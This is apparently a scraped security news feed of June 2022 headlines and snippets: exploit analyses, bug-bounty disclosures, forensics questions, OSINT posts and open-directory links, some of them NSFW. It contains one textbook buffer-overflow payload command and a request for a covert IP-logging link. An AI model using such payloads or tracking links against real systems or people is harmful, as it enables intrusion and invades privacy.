    WebLogic CVE-2021-2294 反序列化 JDBC 漏洞分析
    作者:thiscodecc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg 漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server 反序列化JDBC漏洞,2021年4月21日Oracle发布了致谢信息。 2019年11月底Yang Zhang等人在...
  • Open

    CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q 漏洞信息 前端时间 Sophos Firewall 爆出了一个认证绕过漏洞 CVE-2022-1040 ,最近在深入分析 Sophos 服务架构的同时,完整复现了该漏洞。主要是在 User Portal 及 Webadmin 两个接口存在认证绕过漏洞,漏洞巧妙利用了...
    CVE-2022-27925 Zimbra Collaboration 存在路径穿越漏洞最终导致RCE
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA 漏洞信息 前段时间 Zimbra 官方通报了一个 RCE 漏洞 CVE-2022-27925 ,也有小伙伴在漏洞空间站谈到了这个漏洞,上周末在家有时间完成了漏洞的分析与复现。漏洞原理并不复杂,但在搭建环境的过程中遇到了一些坑,下面将分析过程分享给大家。 从描述来看,...
    WebLogic CVE-2021-2294 反序列化 JDBC 漏洞分析
    作者:thiscodecc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg 漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server 反序列化JDBC漏洞,2021年4月21日Oracle发布了致谢信息。 2019年11月底Yang Zhang等人在...
  • Open

    Kryptos Support Write-up
    Hack The Box Cyber Apocalypse 2022 Continue reading on Medium »

  • Open

    Is it possible to get loader/dropper malware on iPhone?
    Specifically from the Apple App Store- can programs come packed with or download secondary malicious apps that are invisible to the user? Or is this impossible given the file system of the iPhone? submitted by /u/machine_funk [link] [comments]
    Is there any way to only present OTP when client side properties (IP address/useragent) changes
    Hey, While one idea was to have a list of trusted locations (public IP address) and trusted devices (user agent) and if the public ip address or devices associated with the username changed on the /login or /reset-password the user would be presented with an SMS OTP code forum. Why? Many of the web application users are seniors or technically inept users and management wants to lower the number of OTP codes being presented to the users (please note that the devices accessing these applications are stationary PCs) Any other way you'd go about doing this? Anything that can be unique for each client that can be gathered using JS? submitted by /u/RubaLion07 [link] [comments]
    hey guys hope you can help me with my CV
    this is my resume hope you can help me and tell me what I'm missing, i keep applying to jobs but no answer,btw I'm taking my OSCP exam next week https://www.velvetjobs.com/resume/spkheh/ahmed-tahah submitted by /u/J0r3n3y [link] [comments]
    How to safe share password and other sensitive information in the company?
    What ways do you know how to share sensitive information? For example to share a password to an FTP or API doc, or a private link, etc. I know this resource: https://onetimesecret.com/, but I'm not sure if it safe. submitted by /u/athanielx [link] [comments]
    Looking for a book/course about gathering threat Intel
    I’ve come across many books in my search about the concept of threat Intel and how to use it. I’m currently looking for a book or course about how to gather threat intelligence data from the clear web and dark web Are there any recommendations? Thank you, submitted by /u/DoubleAgent10 [link] [comments]
    what skills to focus on for top dollar
    What niche or skills are most in demand that business are paying top dollar for. I dont want to be ok at everything as ive heard thats not good but should be an expert in a niche. I am taking sec+ test in a few days and would like to know what skills i should get next in order to be job ready. submitted by /u/Mufakinyanyo [link] [comments]
  • Open

    Hacking into the worldwide Jacuzzi SmartTub network
    submitted by /u/EatonZ [link] [comments]
    Zero Trust - A Layered Approach against threats
    submitted by /u/J_0_5 [link] [comments]
    semgrep rule pack by elttam - Java entry-points and security issues in Jackson, Spring Remoting, and Struts DMI
    submitted by /u/Gallus [link] [comments]
    Linux Threat Hunting: 'Syslogk' a kernel rootkit found under development in the wild
    submitted by /u/nykzhang [link] [comments]
  • Open

    Mix Content
    https://www.midian.appboxes.co/APPS1/ https://lockdown.madhouse.appboxes.co/Software/ https://lmao.lolxd.workers.dev/0:/ ​ Not sure if it has any NSFW content. submitted by /u/tempoguyx [link] [comments]
    Some audiobooks- there's a gud section on Terry Pratchett. I searched using "site:reddit.com/r/opendirectories/ drunkresearch" and got nothing so looks NEW!
    submitted by /u/ringofyre [link] [comments]
    text to speech audiobooks
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    War in Ukraine / June 17–19
    To capture Luhansk region till June 26 Continue reading on Medium »
    How to use GIS for Machine Learning
    In our 2 previous amazing articles : Continue reading on Preligens Stories »
    OSINT DOJO- Geolocation Challenge! 20 Jun 2022
    Usually the first thing I would do as a low hanging fruit is to just run the image through Tineye, Yandex and Google Image Search. Nothing… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki周刊(第433期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki周刊(第433期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Authentication CSRF resulting in unauthorized account access on Krisp app
    Krisp disclosed a bug submitted by yassineaboukir: https://hackerone.com/reports/1267476 - Bounty: $1000
    Add more seats by paying less via PUT /v2/seats request manipulation
    Krisp disclosed a bug submitted by life__001: https://hackerone.com/reports/1446090 - Bounty: $500
    Admin Authentication Bypass Lead to Admin Account Takeover
    UPS VDP disclosed a bug submitted by 7odamo: https://hackerone.com/reports/1490470
  • Open

    Magnet axiom process error message
    Hi, I have come across this error message (process error - axiom process encountered an error while decrypting the evidence source) in magnet axiom process and can’t find anything that tells what’s wrong. This one occurs on the last step when I attempt to start and analyse the E01 file. I have also started process with the same E01 file with an another computer with less good hardware and that one doesn’t get the error message and starts the process but gets stuck at 40% (when it analyses files and folders) Bitlocker key I’m using is also correct, tested to unlock it multiple times. Is there any clue on what this error message means and why it occurs? To add more, in the ftk imager just saw I got this message: ATTENTION: The following sector(s) on the source drive could not be read: The contents of these sectors were replaced with zeros in the image. I have done three ftk imager now and both end up the same. submitted by /u/Gackie [link] [comments]
    Booting a image from OSFClone
    Hi all, I have made an image of a system with OSFClone. This generated a file with no file extension. Now I want to boot a copy of the system in vmware workstation but it does only accept .raw or .dd files. I can view the file in Autopsy. Does anyone know how to boot this image file? Tanks in advance! submitted by /u/ProAdmin007 [link] [comments]
  • Open

    Every XSS is different
    Today I’m going to talk about an XSS that I found on a public bugbounty program about a year ago, this program has multiple websites and… Continue reading on Medium »
    The mistakes of a novice
    Who is Soheil vanaee? Continue reading on Medium »
    How I found 5 CVEs in few days
    Hi all, Continue reading on Medium »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on System Weakness »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on Medium »
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    FreeBuf早报 | 美当局称已捣毁僵尸网络RSOCKS;去中心化金融遭网络犯罪重创
    美国当局与德国、荷兰和英国的执法机构合作,成功拆除了与俄罗斯僵尸网络RSOCKS有关的基础设施。
    Google发布《SOC建设指南》,对未来SOC提出新思考
    Google从SOC转型的意义、自动化安全运营的定义,以及实现自动化安全的运营的具体方法探讨未来自动化SOC的建设方向。
    美国司法部成功打掉了 RSocks 僵尸网络
    该僵尸网络在受害者不知情的状况下,入侵和劫持全球数百万台计算机、智能手机和物联网设备,用作代理服务器。
    使用西门子工控系统的注意了,已经暴露了15个安全漏洞
    西门子 SINEC 网络管理系统 (NMS) 中存在 15 个安全漏洞,可能被攻击者混合使用,以在受影响的系统上实现远程代码执行。
    DeadBolt 勒索软件再次发难,威联通正展开调查
    QNAP近期检测到新的DeadBolt勒索软件活动,根据目前受害者的报告,该攻击活动似乎针对运行QTS 4.x系统版本的NAS设备。

  • Open

    Account Takeover by OTP bypass
    Hey everyone! This bypass is little bit interesting and you will get to learn a lot hopefully. Continue reading on Medium »
    SQLI-Real-Victim
    Hello guys, in this tutorial I have real victim in my article, and I do not really want to censor it because they act like an idiot people… Continue reading on Medium »
    How I found my first Bug using my android phone
    Hello there!! Continue reading on Medium »
    Bug Bounty Tips
    Oke disini saya akan berbagi pengalaman tips yang mungkin cukup berguna bagi bug hunter, sebelumnya saya akan menjelaskan apa itu postman. Continue reading on Medium »
    How an broken link got me over €250
    Hey! This is Prath. I’m here to tell you about an old finding I made, in which I found an broken link. Continue reading on Medium »
  • Open

    On-demand / online introductory courses / certifications in IT-Forensics ~ $500 USD?
    Hello, Just to be clear, I've read the FAQ here about "Which forensics certifications should I get?". I am (surprise surprise) a EU-citizen so looking for on-demand / online training course which is a prep. for a certificate in IT-Forensics encompassing the basics pref. without being geared towards a specific vendor (EnCase etc.). I am paying this out of pocket so IACIS and SANS / GIAC certificates are too expensive, I was thinking about around $500 USD or around that for both a: * Online / on-demand course which would cover the exam * Including an exam voucher The ONLY alternative I've found is the EC-Council Digital Forensics Essentials which for $199 covers an on-demand course and gives one attempt for the certification; EC-Council Computer Forensics Investigation Training | EC-Council iClass (eccouncil.org) now what I've read about CEH and CHFI aren't exactly stellar and peoples experience with EC-Council as a whole doesn't seem to be that as well (go figure). Does anyone have any other suggestions? I've already taken Network+, Security+ and thinking about taking the A+ just to have the CompTIA trifecta, other then that I have various Azure and AWS certificates. Other then A+ I was thinking about delving into Python which seems both interesting and also worthwhile in the DFIR / IT-Forensics field. Linux+ from CompTIA is also on the roadmap. Thank you for your time and suggestions! submitted by /u/TheSwede86 [link] [comments]
    SANS FOR508 on Linux
    Hi all, Soon attending FOR508 and have an unanswered question. Prerequisites for the course states Virtualization software on Windows/MacOS - anyone know any reason why it shouldn’t be ok to run it on top of Linux? submitted by /u/redditsecguy [link] [comments]
    any websites to track ips or view them when they click on the link?
    I'm looking for kind of a troll website that people can click on and get their ip address visit registered whenever they do it so i can see them,the reason is because i'm being harrased by My ex boyfriend and his girlfriend and i have no way to prove it and i know a website that gives me the address with the ip but not the ip itself,or if i could pay one of you guys to make that website for me if it is possible and how much would that cost and show me of course a few of your previous work ID kindly apprecciate it if you educate me a little bit on this topic. Thank you, Best regards. submitted by /u/Proper-Ad-1944 [link] [comments]
  • Open

    SecWiki News 2022-06-19 Review
    静态分析及代码审计自动化相关资料收集 by ourren Pwn思维导图 by ourren CodeQL 数据库创建原理分析 by ourren 我的前端学习路线 by ourren 一篇论文如何摧毁比特币的匿名性 by ourren 对安全网闸产品初探 by ourren 我的知识管理方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-19 Review
    静态分析及代码审计自动化相关资料收集 by ourren Pwn思维导图 by ourren CodeQL 数据库创建原理分析 by ourren 我的前端学习路线 by ourren 一篇论文如何摧毁比特币的匿名性 by ourren 对安全网闸产品初探 by ourren 我的知识管理方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    Liste, elenchi, serie e altri oggetti pericolosi
    Una settimana fa, dopo qualche ripensamento, mi sono convinto ad affrontare — sul canale YouTube di Intelli|sfèra — la questione della… Continue reading on Medium »
    SPY NEWS: 2022 — Week 24
    Summary of the espionage-related news stories for the Week 24 (12–18 June) of 2022. Continue reading on Medium »
  • Open

    Authentication token and CSRF token bypass
    Enjin disclosed a bug submitted by whiteshadow201: https://hackerone.com/reports/998457 - Bounty: $300
    bypass forced password protection via circles app
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1406926 - Bounty: $100
  • Open

    New blog - NMAP and CME 101 stuff
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    NSFW Pics few folders, few pics each.
    small OD, Big Tits. https://bustygrls.com/pics/images/ BlakeLively Canucks Halloween KimKardashian LindsayLohan Masturbation NickiMinaj Rihanna RitaOra ScarlettJohansson Winter babes blowjobs booty celebs cleavage emo milf pro pussy titties tittyfuck voluptuous xmas ​ JPG's Total wall clock time: 1m 13s Downloaded: 696 files, 36M in 5.6s (6.45 MB/s) submitted by /u/thats_dumberst [link] [comments]
  • Open

    FreeBuf早报 | 前亚马逊工程师曾盗窃1亿人数据;八成互联网电视非法采集用户数据
    前亚马逊软件工程师 Paige Thompson 被指控在 2019 年从 Capital One 窃取数据,可因电信欺诈被判处最高20年监禁。
  • Open

    Is there an easy way to tell which Cisco devices can have smartinstall service?
    I’m teaching a class, and thought about buying a Cisco device to demonstrate how to exploit the smartinstall service to get the hashes and crack them. But of course I’d buy old used on eBay. But no idea which devices SI can run on. Thanks submitted by /u/networkalchemy [link] [comments]

  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. This is a web challenge. The challenge was created on 13th February 2021. It is a… Continue reading on Medium »
    Lesser Known Web Attacks: Server Side Injection
    Introduction Continue reading on Medium »
    OAuth Misconfiguration Leads To Pre-Account Takeover
    Hello, Continue reading on Medium »
    How I hacked one of the biggest Airline in the world
    Hello Bug Bounty community, this is my first write up about a bug that I managed to takeover all accounts in one of well known Airline in… Continue reading on Medium »
    My First Bug- Account Takeover
    Hi Amazing People, Hope you are all doing well. This is my very first article on my first ever bug that I found. So in case if you find… Continue reading on Medium »
    AlbusSec:- Penetration-List 011 API Vulnerabilities  — Sample
    Hi Information Security folk, I hope you liked my previous article that was on Cross-Origin-Resource-Sharing(CORS) Misconfiguration… Continue reading on Medium »
    How I found a No Rate Limit bug
    Hello everyone, Continue reading on Medium »
  • Open

    I made a website can detect over 1000 extensions and shows you the percentage of users that share the same extensions.
    submitted by /u/z0ccc_z0ccc [link] [comments]
    Dangerous Repository of DoS, Red Teaming TTPs, and ICS Exploits
    submitted by /u/entropydaemon6 [link] [comments]
    Scheduled Scaling Up & Down Of EC2 Server
    submitted by /u/ajaidanial [link] [comments]
    I have created a burp suite extension which allows pentester to keep track of each APIs, write test cases for individual APIs. Lastly the extension allows to map the vulnerable apis to the list of vulnerabilities using a custom checklist.
    submitted by /u/Ano_F [link] [comments]
  • Open

    Clair – Vulnerability Static Analysis for Containers
    Article URL: https://github.com/quay/clair Comments URL: https://news.ycombinator.com/item?id=31793991 Points: 8 # Comments: 0
  • Open

    OSINTGRAM — Extrair dados do perfil do Instagram
    OSINTGRAM é uma ferramenta desenvolvida em python3 que permite de forma prática extrair diversos dados de um perfil público do instagram… Continue reading on 100security »
    Life of a Minion
    If we look cautiously enough our social media has already been flooded with sock puppets, swaying our thoughts about a particular topic in… Continue reading on Medium »
    Instaloader — Instagram On Your Terminal
    Have you ever wanted to stop using Instagram, but couldn't because you will be missing your “friends” posts and stories. Use INSTALOADER. Continue reading on Medium »
  • Open

    I clicked on a phising link in my android phone and redirected to 404 not found. Is my information at risk?
    So I got this link in a text message, saying there's been an attempt to log into my amazon account from another country, and I needed to verify my account. I became rather scared and clicked on the link, but it led to a 404 not found page. Then I realized it was a scam and closed the site. I ran an antivirus scan and found nothing. From what I read on the internet, my understanding is that unless I give my personal info or install another app following the phising link, I should be okay. Because my device can't be harmed just by clicking on a link because android apps are sandboxed and one app can't get info from another app. However, what I don't understand is, why would scammers put a 404 not found page if they want any information? Does it not beat the purpose? How can anyone enter info in a dead page? Apparently microsoft already warned about this type of 404 not found phising links. Is it the case that it is a custom 404 page that's not supposed to look dead? My my page looked very dead. I'm rather confused. submitted by /u/Lame_Buddha [link] [comments]
  • Open

    Broken access control
    UPS VDP disclosed a bug submitted by nayefhamouda: https://hackerone.com/reports/1539426
  • Open

    SecWiki News 2022-06-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    X (2022) — Movie Review
    X (2022) is a slasher horror thriller from Ti West and is set in the late 1970s Texas where an adult film crew decides to take up the… Continue reading on Medium »
  • Open

    关于BIS的《信息安全控制:网络安全条目》的解读及影响分析
    本文主要是对美国商务部工业和安全局(BIS)于2022年5月26日发布的《Information Securi … 继续阅读关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 →
  • Open

    Handling null bytes for buffer overflows
    Hello, I am reading the book Hacking: The Are of Explioitation and trying to perfrom a buffer overflow. The command that is used reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10') But on my machine I have a null byte (\x00\x00\x07\xe1) therefore it does not handle well this and ommits my null bytes. I tried using piping , even trying to play with the source code of shell but it does not work .. do you might have any ideas how can I overcome this issue? ​ When doing printf "\xe1\x07\x00\x00: | hd I am managing to piping the null byte.. (without command substitution I am managing to piping the null bytes.. thinking somehow to use this way. Edited: It also works when writing into file, I do see the null bytes when ding: hd < args But the stdin is not redirected :( When dping ./myExe < args it still sees < as an argument (so doing certain manipulations with gdb that I saw on the internet i.e https://stackoverflow.com/questions/2953658/gdb-trouble-with-stdin-redirection?fbclid=IwAR16ic5ia0811JN18Dp0Aex7juTkT_KuX_g9A0huhwzZsdE4__myUJm5sUI) submitted by /u/MrsSergeivna [link] [comments]
  • Open

    Giving Red Team Ops certs to women and LGBTQIA+ for Pride Month!
    submitted by /u/VVX7 [link] [comments]

  • Open

    CSRF leads to account takeover in Yahoo!
    submitted by /u/vinay737 [link] [comments]
    Analyzing the latest version of Matanbuchus
    submitted by /u/OwnPreparation3424 [link] [comments]
    Securing OT Network Management Systems: Siemens SINEC NMS
    submitted by /u/derp6996 [link] [comments]
    AWS Lambda Command Injection
    submitted by /u/lormayna [link] [comments]
    BRATA is evolving into an APT | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
  • Open

    【安全通报】Cisco 多款 Small Business 路由器远程代码执...
    近日,Cisco 发布安全通告,修复了多款小型企业路由器的多个漏洞。Cisco Small Business RV110W、RV130、RV130W和RV215W路由器基于web的管理界面中存在漏洞,使...
  • Open

    【安全通报】Cisco 多款 Small Business 路由器远程代码执...
    近日,Cisco 发布安全通告,修复了多款小型企业路由器的多个漏洞。Cisco Small Business RV110W、RV130、RV130W和RV215W路由器基于web的管理界面中存在漏洞,使...
  • Open

    甲方群里疯传的2022攻防演练实践指南,我们终于拿到了!
    指南在手,高分我有!
    甲方群里疯传的2022攻防演练实践指南,我们终于拿到了!
    指南在手,高分我有!
    CVE-2021-31760 Webmin 跨站请求伪造漏洞
    CSRF直接能够点击上线的一个典型案例。
    内网渗透 | 正向代理与nginx配置反向代理详解
    之前一直不太了解nginx是如何实现反向代理的,这里总结一下。
    MetaMask 浏览器扩展钱包 demonic 漏洞分析
    如果你需要协助检测 demonic vulnerability,请联系慢雾安全团队。
    未打补丁的Microsoft Exchange服务器正受勒索软件BlackCat的攻击
    微软发出了一则警告,称“黑猫”勒索软件(BlackCat)正利用未打补丁的Exchange服务器漏洞来获取对目标网络的访问权限。
    一文掌握软件安全必备技术 SAST
    静态应用程序安全测试,也称为静态分析,它通过直接查看应用程序的源代码发现各种安全漏洞,以避免企业损失。
    FreeBuf周报 | 乌克兰将重要数据迁移北约邻国;美举行2022年度网络盾牌演习
    美国举行2022年度“网络盾牌”演习。
    研究员发现恶意软件IceXLoader 3.0新版本,使用Nim语言开发
    研究人员近日发现 IceXLoader 的最新 3.0 版本是使用 Nim 语言开发的,这种语言在过去两年中被攻击者尝试应用在攻击中。
    新型Loader BumbleBee攻击增加,被勒索团伙利用
    研究人员发现近期 BumbleBee 的活跃,服务器数量显著增加,并且发现了多个版本的更新与改进。
    攻防演练中如何避免浏览器成为攻击方“入口” | FreeBuf甲方群话题讨论
    大家最关注的浏览器相关安全需求是什么?有没有什么方法平衡浏览器的安全性、易用性和兼容性?
    “暗象”组织:潜藏十年的网络攻击
    “暗象”组织的主要攻击手段是使用谷歌/雅虎邮箱或者利用盗取的邮箱,向对方发送极具迷惑性的鱼叉邮件。
    因盗取裸体照片,iCloud黑客被判9年监禁
    一名男子承认入侵了数千个 Apple iCloud 帐户,窃取了大量受害者裸体照片和视频。
    存储桶上传策略和签名 URL的绕过及利用
    本文中带有自己一些拙见,读者若存在相关问题或者有其他想法的,欢迎在评论区交流探讨。
    威胁行为者利用企业滥用微软Office 365某功能,对企业发起勒索攻击
    威胁行为者可能会劫持Office 365账户,对存储在SharePoint和OneDrive服务中的文件进行加密,以获得赎金。
  • Open

    Hacking a NFT Marketplace
    Background: Continue reading on Medium »
    CRLF injection scanner
    The most powerful CRLF injection (HTTP Response Splitting) scanner. CRLFsuite — CRLF injection scanner Continue reading on Medium »
    Fuzzing With Custom Wordlists
    Hello Hackers Continue reading on Medium »
  • Open

    Automating Cobalt Strike with Python
    TL;DR I have expanded the payload_automation Python libraries to allow for synchronously controlling actions in a Cobalt Strike Beacon by adding the Beacon class. This enables you to script out Cobalt Strike actions purely in Python and avoid coding anything in Sleep completely (at least for things I’ve already implemented).  One important fact to take note of is that the actions happen synchronously. Those who have worked in Sleep/Aggressor know that it’s a fire and forget language in most cases, so waiting until an action is completed or adding logic based on the results of an action is notoriously difficult to accomplish. With this library, we can synchronize the actions and in most cases, easily capture the output of a specific action in Python and perform actions based on that output…
  • Open

    sql injection via https://setup.p2p.ihost.com/
    IBM disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1567516
    CSRF Bypassed on Logout Endpoint
    Enjin disclosed a bug submitted by er_salil: https://hackerone.com/reports/1091403
    Race condition via project team member invitation system.
    Enjin disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1108291 - Bounty: $60
  • Open

    War in Ukraine / June 16
    Ukraine can get the status of a candidate for EU membership in a week Continue reading on Medium »
    Van kantoorklerk naar burgerjournalist: dit is het verhaal van Bellingcat
    Hoewel de meeste mensen sociale media vooral gebruiken voor vermaak en het onderhouden van contacten, gebruikt Eliot Higgins ze voor heel… Continue reading on Journalistiek Ede Kijk-luister-leeslijst »
    OhSINT — TryHackMe WriteUp
    Open Source Intelligence (OSINT) is a sub-type of threat intelligence that is only gathered from free, public sources. Continue reading on Medium »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): 开源实现 by ourren 我和SRC的故事 by ourren “暗象”组织:潜藏十年的网络攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): 开源实现 by ourren 我和SRC的故事 by ourren “暗象”组织:潜藏十年的网络攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reddit patches CSRF vulnerability that forced users to view NSFW content
    Article URL: https://portswigger.net/daily-swig/reddit-patches-csrf-vulnerability-that-forced-users-to-view-nsfw-content Comments URL: https://news.ycombinator.com/item?id=31779704 Points: 3 # Comments: 0
  • Open

    How to forensics copy Google Drive?
    Hello everyone! Excluding UFED and Magnet Axiom, there are any other software to provide a forensics acquisition of a Google Account/Google Drive? submitted by /u/Zipper_Ita [link] [comments]
    Dept just added a computer liaison program to our ranks. They are to assist with the Computer Crime Task Force. What trainings, certifications or programs can be recommended in taking outside of vendor specific training?
    Looking for some guidance to get certifications and trainings that my department may not be aware of. Outside of vendor specific and NW3C they really haven’t pushed much. Thank you in advance. submitted by /u/Embarrassed_Sky_1193 [link] [comments]
  • Open

    ISO 27001 Awareness Training & Quiz
    Hello! Do you know any worthy of attention ISO 27001 awareness training & quiz? It should be for all internal employees. It should be something not boring, and not difficult. submitted by /u/athanielx [link] [comments]
    Incorporating YARA Into Security Processes?
    Hey guys, I just recently learned about YARA and how it can help identify malware. I want to incorporate it into our current security processes, but to be honest, I'm sorta confused as to what we can truly do with it. YARA Rules sound very similar to just signature based AV. What real advantage does YARA provide and any tips on incorporating it into our daily routines? It seems to be valuable, but after multiple TI courses and YT videos, I'm still lacking the understanding of why it's valuable and how I can use it to better our security posture. submitted by /u/haroldhanson [link] [comments]
  • Open

    CobaltStrike 流量分析与入侵检测
    作者:ainrm@薮猫科技安服团队 公众号:薮猫科技(欢迎关注)https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 一、前言 Cobaltstrike是一款用于团队协作的内网渗透工具,在攻防、测试中扮演着重要角色,其功能强大、使用人数众多,已被各大安全厂商列入重点"照顾"对象。常见的检测方式有基于内存和基于流量两种,本文从流量角度出发,通过抓包...
  • Open

    CobaltStrike 流量分析与入侵检测
    作者:ainrm@薮猫科技安服团队 公众号:薮猫科技(欢迎关注)https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 一、前言 Cobaltstrike是一款用于团队协作的内网渗透工具,在攻防、测试中扮演着重要角色,其功能强大、使用人数众多,已被各大安全厂商列入重点"照顾"对象。常见的检测方式有基于内存和基于流量两种,本文从流量角度出发,通过抓包...
  • Open

    Dev-ops and lots of e-courses
    https://www.kgay4all.com/seioqueseiporleroqueleio/ submitted by /u/inoculatemedia [link] [comments]
    Bunch of dealer mode TV content
    Big files https://cdn.loewe.tv/movies/ submitted by /u/inoculatemedia [link] [comments]

  • Open

    OSINT Blog #1
    I’m going to use this page for a few reasons. Firstly, OSINT Dojo has several rankings, for which need you to have a go at an OSINT CTF… Continue reading on Medium »
    War in Ukraine / June 15
    War in Ukraine / June 15 Continue reading on Medium »
    OSINT: How Dangerous Is It?
    What exactly is OSINT?  Open Source Intelligence (OSINT) are collections of data that can be gathered for free from public sources and… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #3
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Solving HariBahadur CTF
    URL to join the CTF: https://tryhackme.com/jr/haribahadur and can submit flags. The CTF is actually situated on… Continue reading on Medium »
  • Open

    That Pipe Is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/that-pipe-is-still-leaking-revisiting-the-rdp-named-pipe-vulnerability Comments URL: https://news.ycombinator.com/item?id=31771796 Points: 2 # Comments: 0
  • Open

    Consolidate split .e01 image files into single file?
    While creating an image of a 128GB disk, I accidentally set it to split the image into 2GB files. For some situations dealing with 18 files is not ideal. I'm wondering, is there is a way to consolidate the split files into one file? Preferably without mounting the split image and creating a new one? submitted by /u/thenebular [link] [comments]
    Using write blocker to image a drive that is still in computer.
    Anyone have experience using write-blocker to connect and image in the following setup? laptop ——writeblocker—— laptop Any help would be nice thanks ! submitted by /u/mr_merica20 [link] [comments]
    Was given a .dist for NICE Inform, need to convert it to useable audio
    Hello, I've been tasked to combine 911 calls into a playable .mp4. The discovery package includes a .distribution that will only open with NICE Inform. I'm the most tech-savvy of the bunch, but this is really above my pay grade. If anyone has been able to free the audio files from this software before I'd appreciate any advice. Thank you. submitted by /u/Dcap16 [link] [comments]
  • Open

    数据库攻防之MySQL
    MySQL 是最流行的关系型数据库,是红队攻防中最常遇到的数据库。
    从概念到安全实践:软件供应链基础指南
    研究显示,黑客正积极瞄准开源组件以伺机进入软件供应链。在过去的12个月内,针对开源工具的网络攻击增加了650%。
    FreeBuf早报 | 美陆军将云计算技术运用于实战;乌克兰将国家重要数据迁移至邻国
    美陆军将云计算技术融入到指挥所计算环境的开发和试验中,从而在战术边缘提供持续的任务指挥能力。
    国际刑警查获五千万美元,逾两千名“社会工程师”被捕
    一项代号为”First Light 2022“的国际执法行动在全球范围内共查获了5000万美元赃款,数千名参与社会工程诈骗的人遭到逮捕。
    「网安新势力」创始人联盟季 6月22日10点强势来袭!
    解锁7位网安创始人,探寻网安行业新兴技术趋势。
    构建低延时高并发的企业防护架构 | CIS夏日版议题前瞻
    应对威胁态势发展的步伐,数字化时代的WAF该如何演进?让CIS安全专家告诉你!
    邮件巨头Zimbra曝严重漏洞,黑客无需密码即可登录
    通过利用该漏洞,黑客可以在没有身份验证或用户交互的情况下窃取登录信息。
    思科电子邮件存在安全漏洞,攻击者可利用漏洞登录其Web管理界面
    该漏洞可能允许攻击者绕过身份验证并登录到思科电子邮件网关设备的Web管理界面。
    攻击者利用三年前的 Telerik 漏洞部署 Cobalt Strike
    一个被称为Blue Mockingbird的攻击者利用 Telerik UI 漏洞来破坏服务器,安装 Cobalt Strike 信标。
  • Open

    That Pipe is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    submitted by /u/jat0369 [link] [comments]
    Analysing RTF files from SideWinder APT
    submitted by /u/OwnPreparation3424 [link] [comments]
    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    submitted by /u/Gallus [link] [comments]
    The Android kernel mitigations obstacle race
    submitted by /u/0xdea [link] [comments]
    Quick Malware Analysis Using Free Tools: Malware infection from Brazil malspam pcap from 2022-04-19
    submitted by /u/dougburks [link] [comments]
    VED (Vault Exploit Defense): Open source implementation
    submitted by /u/hardenedvault [link] [comments]
    Shadow Credentials - Red Teaming Experiments
    submitted by /u/Kondencuotaspienas [link] [comments]
    DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
    submitted by /u/cryptogram [link] [comments]
  • Open

    xmlrpc file enabled
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1575401
    curl "globbing" can lead to denial of service attacks
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1572120
    CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit !
